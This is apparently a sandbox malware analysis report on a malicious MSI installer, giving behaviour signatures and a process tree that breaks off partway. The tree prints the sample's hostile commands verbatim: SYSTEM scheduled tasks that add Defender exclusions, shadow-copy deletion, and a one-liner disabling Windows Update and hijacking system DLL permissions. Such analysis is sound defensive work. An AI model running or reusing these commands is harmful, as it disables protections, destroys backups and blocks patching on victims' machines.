Analysis

  • max time kernel
    150s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20260513-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20260513-enlocale:en-usos:windows10-2004-x64systemwindows
  • submitted
    04/08/2026, 05:54

General

  • Target
    setup_n0c014.msi
  • Size 5.3MB
  • Sample260804-gl353adh86
  • SHA256 a6377e384d032783d8cd22d371f7c983dca2de11c0367645fa7be95da5d88458
  • MD5 SHA1 SHA512 SSDEEP TLSH

Malware Config

Signatures

  • UAC bypass 3 TTPs 1 IoCs
  • Windows security bypass 2 TTPs 14 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Run Powershell and hide display window.

  • Drops file in Drivers directory 1 IoCs
  • Modifies RDP port number used by Windows 1 TTPs
  • Possible privilege escalation attempt 23 IoCs
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Disables service(s) 3 TTPs
  • Executes dropped EXE 7 IoCs
  • Loads dropped DLL 8 IoCs
  • Modifies file permissions 1 TTPs 23 IoCs
  • Adds Run key to start application 2 TTPs 2 IoCs
  • Badlisted process makes network request 2 IoCs

    Network request originating from process or tool commonly abused by malware.

  • Enumerates connected drives 3 TTPs 46 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Indicator Removal: Clear Persistence 1 TTPs 10 IoCs

    Clear artifacts associated with previously established persistence like scheduletasks on a host.

  • Drops file in System32 directory 7 IoCs
  • Drops file in Program Files directory 18 IoCs
  • Drops file in Windows directory 9 IoCs
  • Launches sc.exe 8 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Installer Packages 2 TTPs 1 IoCs
  • Event Triggered Execution: Screensaver 1 TTPs 3 IoCs

    Screensavers are programs that execute after a configurable time of user inactivity and consist of Portable Executable (PE) files with a .scr file extension.

  • Executes a command shell one-liner 1 TTPs 25 IoCs

    Execution of a cmd.exe one-liner (/c "close" or /k "keep") is a common script/loader stage.

  • System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Checks SCSI registry key(s) 3 TTPs 5 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Modifies Control Panel 4 IoCs
  • Modifies data under HKEY_USERS 9 IoCs
  • Modifies registry class 23 IoCs
  • Runs net.exe
  • Scheduled Task/Job: Scheduled Task 1 TTPs 10 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: LoadsDriver 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • System policy modification 1 TTPs 1 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

Processes

  • C:\Windows\system32\msiexec.exe
    msiexec.exe /I C:\Users\Admin\AppData\Local\Temp\setup_n0c014.msi
    1⤵
    • Enumerates connected drives
    • Event Triggered Execution: Installer Packages
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of FindShellTrayWindow
    PID:4740
  • C:\Windows\system32\msiexec.exe
    C:\Windows\system32\msiexec.exe /V
    1⤵
    • Enumerates connected drives
    • Drops file in Windows directory
    • Modifies data under HKEY_USERS
    • Modifies registry class
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:1784
    • C:\Windows\system32\srtasks.exe
      C:\Windows\system32\srtasks.exe ExecuteScopeRestorePoint /WaitForRestorePoint:2
      2⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:416
    • C:\Windows\System32\MsiExec.exe
      C:\Windows\System32\MsiExec.exe -Embedding 6BDCC6A145644F1880CA286DEA86FB83 E Global\MSI0000
      2⤵
      • Loads dropped DLL
      • Badlisted process makes network request
      • Drops file in System32 directory
      • Modifies data under HKEY_USERS
      • Suspicious behavior: EnumeratesProcesses
      PID:3604
  • C:\Windows\system32\vssvc.exe
    C:\Windows\system32\vssvc.exe
    1⤵
    • Checks SCSI registry key(s)
    • Suspicious use of AdjustPrivilegeToken
    PID:4376
  • C:\Users\Public\eaeRes\m8CyIV.exe
    C:\Users\Public\eaeRes\m8CyIV.exe
    1⤵
    • Checks computer location settings
    • Executes dropped EXE
    • Loads dropped DLL
    • Adds Run key to start application
    • Drops file in System32 directory
    • Drops file in Program Files directory
    • Modifies registry class
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of WriteProcessMemory
    PID:1072
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\Public\eaeRes\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
      2⤵
      • Indicator Removal: Clear Persistence
      • Suspicious use of WriteProcessMemory
      PID:1020
      • C:\Windows\system32\schtasks.exe
        SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\Public\eaeRes\" /t REG_DWORD /d 0 /f"
        3⤵
        • Scheduled Task/Job: Scheduled Task
        PID:552
      • C:\Windows\system32\schtasks.exe
        SCHTASKS /Run /TN "Task1"
        3⤵
          PID:4476
        • C:\Windows\system32\schtasks.exe
          SCHTASKS /Delete /TN "Task1" /F
          3⤵
            PID:4340
        • C:\Windows\System32\cmd.exe
          "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
          2⤵
          • Indicator Removal: Clear Persistence
          • Suspicious use of WriteProcessMemory
          PID:3688
          • C:\Windows\system32\schtasks.exe
            SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f"
            3⤵
            • Scheduled Task/Job: Scheduled Task
            PID:416
          • C:\Windows\system32\schtasks.exe
            SCHTASKS /Run /TN "Task1"
            3⤵
              PID:2256
            • C:\Windows\system32\schtasks.exe
              SCHTASKS /Delete /TN "Task1" /F
              3⤵
                PID:4512
            • C:\Windows\System32\cmd.exe
              "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
              2⤵
              • Indicator Removal: Clear Persistence
              • Suspicious use of WriteProcessMemory
              PID:456
              • C:\Windows\system32\schtasks.exe
                SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\" /t REG_DWORD /d 0 /f"
                3⤵
                • Scheduled Task/Job: Scheduled Task
                PID:4992
              • C:\Windows\system32\schtasks.exe
                SCHTASKS /Run /TN "Task1"
                3⤵
                  PID:1816
                • C:\Windows\system32\schtasks.exe
                  SCHTASKS /Delete /TN "Task1" /F
                  3⤵
                    PID:2804
                • C:\Windows\System32\cmd.exe
                  "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
                  2⤵
                  • Indicator Removal: Clear Persistence
                  • Suspicious use of WriteProcessMemory
                  PID:3276
                  • C:\Windows\system32\schtasks.exe
                    SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\" /t REG_DWORD /d 0 /f"
                    3⤵
                    • Scheduled Task/Job: Scheduled Task
                    PID:4452
                  • C:\Windows\system32\schtasks.exe
                    SCHTASKS /Run /TN "Task1"
                    3⤵
                      PID:4816
                    • C:\Windows\system32\schtasks.exe
                      SCHTASKS /Delete /TN "Task1" /F
                      3⤵
                        PID:176
                    • C:\Windows\System32\cmd.exe
                      "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"%USERPROFILE%\Documents\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
                      2⤵
                      • Indicator Removal: Clear Persistence
                      • Suspicious use of WriteProcessMemory
                      PID:3088
                      • C:\Windows\system32\schtasks.exe
                        SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\Admin\Documents\" /t REG_DWORD /d 0 /f"
                        3⤵
                        • Scheduled Task/Job: Scheduled Task
                        PID:1120
                      • C:\Windows\system32\schtasks.exe
                        SCHTASKS /Run /TN "Task1"
                        3⤵
                          PID:3852
                        • C:\Windows\system32\schtasks.exe
                          SCHTASKS /Delete /TN "Task1" /F
                          3⤵
                            PID:4952
                        • C:\Program Files (x86)\GHgGnw\GHgGnw.exe
                          "C:\Program Files (x86)\GHgGnw\GHgGnw.exe"
                          2⤵
                          • UAC bypass
                          • Drops file in Drivers directory
                          • Checks computer location settings
                          • Executes dropped EXE
                          • Loads dropped DLL
                          • Adds Run key to start application
                          • Drops file in Program Files directory
                          • Event Triggered Execution: Screensaver
                          • Checks processor information in registry
                          • Modifies Control Panel
                          • Suspicious use of WriteProcessMemory
                          • System policy modification
                          PID:4564
                          • C:\Windows\SysWOW64\cmd.exe
                            cmd.exe /c vssadmin delete shadows /all /quiet
                            3⤵
                            • Executes a command shell one-liner
                            • System Location Discovery: System Language Discovery
                            PID:2348
                          • C:\Windows\SysWOW64\cmd.exe
                            cmd.exe /c icacls "C:\Program Files (x86)\GHgGnw" /inheritance:r
                            3⤵
                            • Executes a command shell one-liner
                            • System Location Discovery: System Language Discovery
                            • Suspicious use of WriteProcessMemory
                            PID:4452
                            • C:\Windows\SysWOW64\icacls.exe
                              icacls "C:\Program Files (x86)\GHgGnw" /inheritance:r
                              4⤵
                              • Possible privilege escalation attempt
                              • Modifies file permissions
                              • System Location Discovery: System Language Discovery
                              PID:4472
                          • C:\Windows\SysWOW64\cmd.exe
                            cmd /c echo.>c:\xxxx.ini
                            3⤵
                            • Executes a command shell one-liner
                            PID:1796
                          • C:\Windows\SysWOW64\cmd.exe
                            "C:\Windows\System32\cmd.exe" cmd.exe /q /c "@echo off & (for %i in (wuauserv UsoSvc uhssvc WaaSMedicSvc) do ( net stop %i >nul 2>&1 & sc config %i start= disabled >nul 2>&1 & sc failure %i reset= 0 actions= "" >nul 2>&1 )) & (for %i in (WaaSMedicSvc wuaueng) do ( takeown /f C:\Windows\System32\%i.dll >nul 2>&1 & icacls C:\Windows\System32\%i.dll /grant *S-1-1-0:F >nul 2>&1 & rename C:\Windows\System32\%i.dll %i_BAK.dll >nul 2>&1 & icacls C:\Windows\System32\%i_BAK.dll /setowner "NT SERVICE\TrustedInstaller" >nul 2>&1 & icacls C:\Windows\System32\%i_BAK.dll /remove *S-1-1-0 >nul 2>&1 )) & reg add "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /v Start /t REG_DWORD /d 4 /f >nul 2>&1 & reg add "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /v FailureActions /t REG_BINARY /d 000000000000000000000000030000001400000000000000c0d4010000000000e09304000000000000000000 /f >nul 2>&1 & reg add "HKLM\Software\Policies\Microsoft\Windows\WindowsUpdate\AU" /v NoAutoUpdate /t REG_DWORD /d 1 /f >nul 2>&1 & erase /f /s /q c:\windows\softwaredistribution\*.* >nul 2>&1 & rmdir /s /q c:\windows\softwaredistribution >nul 2>&1 & powershell -NoProfile -WindowStyle Hidden -Command "& {Get-ScheduledTask -TaskPath '\Microsoft\Windows\InstallService\*' | Disable-ScheduledTask -ErrorAction SilentlyContinue; Get-ScheduledTask -TaskPath '\Microsoft\Windows\UpdateOrchestrator\*' | Disable-ScheduledTask -ErrorAction SilentlyContinue; Get-ScheduledTask -TaskPath '\Microsoft\Windows\UpdateAssistant\*' | Disable-ScheduledTask -ErrorAction SilentlyContinue; Get-ScheduledTask -TaskPath '\Microsoft\Windows\WaaSMedic\*' | Disable-ScheduledTask -ErrorAction SilentlyContinue; Get-ScheduledTask -TaskPath '\Microsoft\Windows\WindowsUpdate\*' | Disable-ScheduledTask -ErrorAction SilentlyContinue; Get-ScheduledTask -TaskPath '\Microsoft\WindowsUpdate\*' | Disable-ScheduledTask -ErrorAction SilentlyContinue;}" >nul 2>&1"
                            3⤵
                            • Executes a command shell one-liner
                            • Suspicious use of WriteProcessMemory
                            PID:3180
                            • C:\Windows\SysWOW64\net.exe
                              net stop wuauserv
                              4⤵
                              • System Location Discovery: System Language Discovery
                              • Suspicious use of WriteProcessMemory
                              PID:3668
                              • C:\Windows\SysWOW64\net1.exe
                                C:\Windows\system32\net1 stop wuauserv
                                5⤵
                                  PID:212
                              • C:\Windows\SysWOW64\sc.exe
                                sc config wuauserv start= disabled
                                4⤵
                                • Launches sc.exe
                                • System Location Discovery: System Language Discovery
                                PID:5004
                              • C:\Windows\SysWOW64\sc.exe
                                sc failure wuauserv reset= 0 actions= ""
                                4⤵
                                • Launches sc.exe
                                PID:3704
                              • C:\Windows\SysWOW64\net.exe
                                net stop UsoSvc
                                4⤵
                                • System Location Discovery: System Language Discovery
                                PID:4928
                                • C:\Windows\SysWOW64\net1.exe
                                  C:\Windows\system32\net1 stop UsoSvc
                                  5⤵
                                  • System Location Discovery: System Language Discovery
                                  PID:3700
                              • C:\Windows\SysWOW64\sc.exe
                                sc config UsoSvc start= disabled
                                4⤵
                                • Launches sc.exe
                                • System Location Discovery: System Language Discovery
                                PID:5088
                              • C:\Windows\SysWOW64\sc.exe
                                sc failure UsoSvc reset= 0 actions= ""
                                4⤵
                                • Launches sc.exe
                                • System Location Discovery: System Language Discovery
                                PID:1344
                              • C:\Windows\SysWOW64\net.exe
                                net stop uhssvc
                                4⤵
                                • System Location Discovery: System Language Discovery
                                PID:5116
                                • C:\Windows\SysWOW64\net1.exe
                                  C:\Windows\system32\net1 stop uhssvc
                                  5⤵
                                    PID:3132
                                • C:\Windows\SysWOW64\sc.exe
                                  sc config uhssvc start= disabled
                                  4⤵
                                  • Launches sc.exe
                                  PID:4488
                                • C:\Windows\SysWOW64\sc.exe
                                  sc failure uhssvc reset= 0 actions= ""
                                  4⤵
                                  • Launches sc.exe
                                  • System Location Discovery: System Language Discovery
                                  PID:444
                                • C:\Windows\SysWOW64\net.exe
                                  net stop WaaSMedicSvc
                                  4⤵
                                  • System Location Discovery: System Language Discovery
                                  PID:3740
                                  • C:\Windows\SysWOW64\net1.exe
                                    C:\Windows\system32\net1 stop WaaSMedicSvc
                                    5⤵
                                      PID:4500
                                  • C:\Windows\SysWOW64\sc.exe
                                    sc config WaaSMedicSvc start= disabled
                                    4⤵
                                    • Launches sc.exe
                                    PID:1572
                                  • C:\Windows\SysWOW64\sc.exe
                                    sc failure WaaSMedicSvc reset= 0 actions= ""
                                    4⤵
                                    • Launches sc.exe
                                    • System Location Discovery: System Language Discovery
                                    PID:4536
                                  • C:\Windows\SysWOW64\takeown.exe
                                    takeown /f C:\Windows\System32\WaaSMedicSvc.dll
                                    4⤵
                                    • Possible privilege escalation attempt
                                    • Modifies file permissions
                                    • System Location Discovery: System Language Discovery
                                    PID:1532
                                  • C:\Windows\SysWOW64\icacls.exe
                                    icacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F
                                    4⤵
                                    • Possible privilege escalation attempt
                                    • Modifies file permissions
                                    • System Location Discovery: System Language Discovery
                                    PID:1980
                                  • C:\Windows\SysWOW64\icacls.exe
                                    icacls C:\Windows\System32\WaaSMedicSvc_BAK.dll /setowner "NT SERVICE\TrustedInstaller"
                                    4⤵
                                    • Possible privilege escalation attempt
                                    • Modifies file permissions
                                    • System Location Discovery: System Language Discovery
                                    PID:4856
                                  • C:\Windows\SysWOW64\icacls.exe
                                    icacls C:\Windows\System32\WaaSMedicSvc_BAK.dll /remove *S-1-1-0
                                    4⤵
                                    • Possible privilege escalation attempt
                                    • Modifies file permissions
                                    • System Location Discovery: System Language Discovery
                                    PID:1728
                                  • C:\Windows\SysWOW64\takeown.exe
                                    takeown /f C:\Windows\System32\wuaueng.dll
                                    4⤵
                                    • Possible privilege escalation attempt
                                    • Modifies file permissions
                                    • System Location Discovery: System Language Discovery
                                    PID:2348
                                  • C:\Windows\SysWOW64\icacls.exe
                                    icacls C:\Windows\System32\wuaueng.dll /grant *S-1-1-0:F
                                    4⤵
                                    • Possible privilege escalation attempt
                                    • Modifies file permissions
                                    PID:4836
                                  • C:\Windows\SysWOW64\icacls.exe
                                    icacls C:\Windows\System32\wuaueng_BAK.dll /setowner "NT SERVICE\TrustedInstaller"
                                    4⤵
                                    • Possible privilege escalation attempt
                                    • Modifies file permissions
                                    • System Location Discovery: System Language Discovery
                                    PID:3988
                                  • C:\Windows\SysWOW64\icacls.exe
                                    icacls C:\Windows\System32\wuaueng_BAK.dll /remove *S-1-1-0
                                    4⤵
                                    • Possible privilege escalation attempt
                                    • Modifies file permissions
                                    • System Location Discovery: System Language Discovery
                                    PID:1236
                                  • C:\Windows\SysWOW64\reg.exe
                                    reg add "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /v Start /t REG_DWORD /d 4 /f
                                    4⤵
                                    • System Location Discovery: System Language Discovery
                                    PID:212
                                  • C:\Windows\SysWOW64\reg.exe
                                    reg add "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /v FailureActions /t REG_BINARY /d 000000000000000000000000030000001400000000000000c0d4010000000000e09304000000000000000000 /f
                                    4⤵
                                      PID:5024
                                    • C:\Windows\SysWOW64\reg.exe
                                      reg add "HKLM\Software\Policies\Microsoft\Windows\WindowsUpdate\AU" /v NoAutoUpdate /t REG_DWORD /d 1 /f
                                      4⤵
                                      • System Location Discovery: System Language Discovery
                                      PID:3564
                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      powershell -NoProfile -WindowStyle Hidden -Command "& {Get-ScheduledTask -TaskPath '\Microsoft\Windows\InstallService\*' | Disable-ScheduledTask -ErrorAction SilentlyContinue; Get-ScheduledTask -TaskPath '\Microsoft\Windows\UpdateOrchestrator\*' | Disable-ScheduledTask -ErrorAction SilentlyContinue; Get-ScheduledTask -TaskPath '\Microsoft\Windows\UpdateAssistant\*' | Disable-ScheduledTask -ErrorAction SilentlyContinue; Get-ScheduledTask -TaskPath '\Microsoft\Windows\WaaSMedic\*' | Disable-ScheduledTask -ErrorAction SilentlyContinue; Get-ScheduledTask -TaskPath '\Microsoft\Windows\WindowsUpdate\*' | Disable-ScheduledTask -ErrorAction SilentlyContinue; Get-ScheduledTask -TaskPath '\Microsoft\WindowsUpdate\*' | Disable-ScheduledTask -ErrorAction SilentlyContinue;}"
                                      4⤵
                                      • Command and Scripting Interpreter: PowerShell
                                      PID:4312
                                  • C:\Windows\SysWOW64\cmd.exe
                                    "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\GHgGnw\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
                                    3⤵
                                    • Indicator Removal: Clear Persistence
                                    • System Location Discovery: System Language Discovery
                                    • Suspicious use of WriteProcessMemory
                                    PID:2876
                                    • C:\Windows\SysWOW64\schtasks.exe
                                      SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\GHgGnw\" /t REG_DWORD /d 0 /f"
                                      4⤵
                                      • System Location Discovery: System Language Discovery
                                      • Scheduled Task/Job: Scheduled Task
                                      PID:3716
                                    • C:\Windows\SysWOW64\schtasks.exe
                                      SCHTASKS /Run /TN "Task1"
                                      4⤵
                                      • System Location Discovery: System Language Discovery
                                      PID:4512
                                    • C:\Windows\SysWOW64\schtasks.exe
                                      SCHTASKS /Delete /TN "Task1" /F
                                      4⤵
                                      • System Location Discovery: System Language Discovery
                                      PID:3604
                                  • C:\Windows\SysWOW64\cmd.exe
                                    "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
                                    3⤵
                                    • Indicator Removal: Clear Persistence
                                    • System Location Discovery: System Language Discovery
                                    • Suspicious use of WriteProcessMemory
                                    PID:2084
                                    • C:\Windows\SysWOW64\schtasks.exe
                                      SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f"
                                      4⤵
                                      • System Location Discovery: System Language Discovery
                                      • Scheduled Task/Job: Scheduled Task
                                      PID:1812
                                    • C:\Windows\SysWOW64\schtasks.exe
                                      SCHTASKS /Run /TN "Task1"
                                      4⤵
                                      • System Location Discovery: System Language Discovery
                                      PID:4880
                                    • C:\Windows\SysWOW64\schtasks.exe
                                      SCHTASKS /Delete /TN "Task1" /F
                                      4⤵
                                      • System Location Discovery: System Language Discovery
                                      PID:4872
                                  • C:\Windows\SysWOW64\cmd.exe
                                    cmd.exe /c icacls "C:\Program Files (x86)\GHgGnw" /grant:r Administrators:(OI)(CI)F /grant:r SYSTEM:(OI)(CI)F
                                    3⤵
                                    • Executes a command shell one-liner
                                    • Suspicious use of WriteProcessMemory
                                    PID:2772
                                    • C:\Windows\SysWOW64\icacls.exe
                                      icacls "C:\Program Files (x86)\GHgGnw" /grant:r Administrators:(OI)(CI)F /grant:r SYSTEM:(OI)(CI)F
                                      4⤵
                                      • Possible privilege escalation attempt
                                      • Modifies file permissions
                                      • System Location Discovery: System Language Discovery
                                      PID:4100
                                  • C:\Windows\SysWOW64\cmd.exe
                                    "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
                                    3⤵
                                    • Indicator Removal: Clear Persistence
                                    • Suspicious use of WriteProcessMemory
                                    PID:4956
                                    • C:\Windows\SysWOW64\schtasks.exe
                                      SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\" /t REG_DWORD /d 0 /f"
                                      4⤵
                                      • System Location Discovery: System Language Discovery
                                      • Scheduled Task/Job: Scheduled Task
                                      PID:4732
                                    • C:\Windows\SysWOW64\schtasks.exe
                                      SCHTASKS /Run /TN "Task1"
                                      4⤵
                                      • System Location Discovery: System Language Discovery
                                      PID:4972
                                    • C:\Windows\SysWOW64\schtasks.exe
                                      SCHTASKS /Delete /TN "Task1" /F
                                      4⤵
                                      • System Location Discovery: System Language Discovery
                                      PID:3212
                                  • C:\Windows\SysWOW64\cmd.exe
                                    cmd.exe /c icacls "C:\Program Files (x86)\GHgGnw" /grant:r Users:(OI)(CI)(RX) /deny Users:(OI)(CI)(DC)
                                    3⤵
                                    • Executes a command shell one-liner
                                    • System Location Discovery: System Language Discovery
                                    • Suspicious use of WriteProcessMemory
                                    PID:1452
                                    • C:\Windows\SysWOW64\icacls.exe
                                      icacls "C:\Program Files (x86)\GHgGnw" /grant:r Users:(OI)(CI)(RX) /deny Users:(OI)(CI)(DC)
                                      4⤵
                                      • Possible privilege escalation attempt
                                      • Modifies file permissions
                                      • System Location Discovery: System Language Discovery
                                      PID:1820
                                  • C:\Windows\SysWOW64\cmd.exe
                                    "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
                                    3⤵
                                    • Indicator Removal: Clear Persistence
                                    • Suspicious use of WriteProcessMemory
                                    PID:4480
                                    • C:\Windows\SysWOW64\schtasks.exe
                                      SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\" /t REG_DWORD /d 0 /f"
                                      4⤵
                                      • System Location Discovery: System Language Discovery
                                      • Scheduled Task/Job: Scheduled Task
                                      PID:4280
                                    • C:\Windows\SysWOW64\schtasks.exe
                                      SCHTASKS /Run /TN "Task1"
                                      4⤵
                                      • System Location Discovery: System Language Discovery
                                      PID:3528
                                    • C:\Windows\SysWOW64\schtasks.exe
                                      SCHTASKS /Delete /TN "Task1" /F
                                      4⤵
                                      • System Location Discovery: System Language Discovery
                                      PID:1316
                                  • C:\Windows\SysWOW64\cmd.exe
                                    cmd.exe /c icacls "C:\Program Files (x86)\GHgGnw\GHgGnw.exe" /inheritance:r
                                    3⤵
                                    • Executes a command shell one-liner
                                    • Suspicious use of WriteProcessMemory
                                    PID:1804
                                    • C:\Windows\SysWOW64\icacls.exe
                                      icacls "C:\Program Files (x86)\GHgGnw\GHgGnw.exe" /inheritance:r
                                      4⤵
                                      • Possible privilege escalation attempt
                                      • Modifies file permissions
                                      • System Location Discovery: System Language Discovery
                                      PID:736
                                  • C:\Windows\SysWOW64\cmd.exe
                                    cmd.exe /c icacls "C:\Program Files (x86)\GHgGnw\GHgGnw.exe" /grant:r Administrators:(OI)(CI)F /grant:r SYSTEM:(OI)(CI)F
                                    3⤵
                                    • Executes a command shell one-liner
                                    • Suspicious use of WriteProcessMemory
                                    PID:3992
                                    • C:\Windows\SysWOW64\icacls.exe
                                      icacls "C:\Program Files (x86)\GHgGnw\GHgGnw.exe" /grant:r Administrators:(OI)(CI)F /grant:r SYSTEM:(OI)(CI)F
                                      4⤵
                                      • Possible privilege escalation attempt
                                      • Modifies file permissions
                                      PID:4556
                                  • C:\Windows\SysWOW64\cmd.exe
                                    cmd.exe /c icacls "C:\Program Files (x86)\GHgGnw\GHgGnw.exe" /grant:r Users:(RX) /deny Users:(DE)
                                    3⤵
                                    • Executes a command shell one-liner
                                    • System Location Discovery: System Language Discovery
                                    • Suspicious use of WriteProcessMemory
                                    PID:4292
                                    • C:\Windows\SysWOW64\icacls.exe
                                      icacls "C:\Program Files (x86)\GHgGnw\GHgGnw.exe" /grant:r Users:(RX) /deny Users:(DE)
                                      4⤵
                                      • Possible privilege escalation attempt
                                      • Modifies file permissions
                                      • System Location Discovery: System Language Discovery
                                      PID:2908
                                  • C:\Windows\SysWOW64\cmd.exe
                                    cmd.exe /c icacls "C:\Program Files (x86)\GHgGnw\image.png" /inheritance:r
                                    3⤵
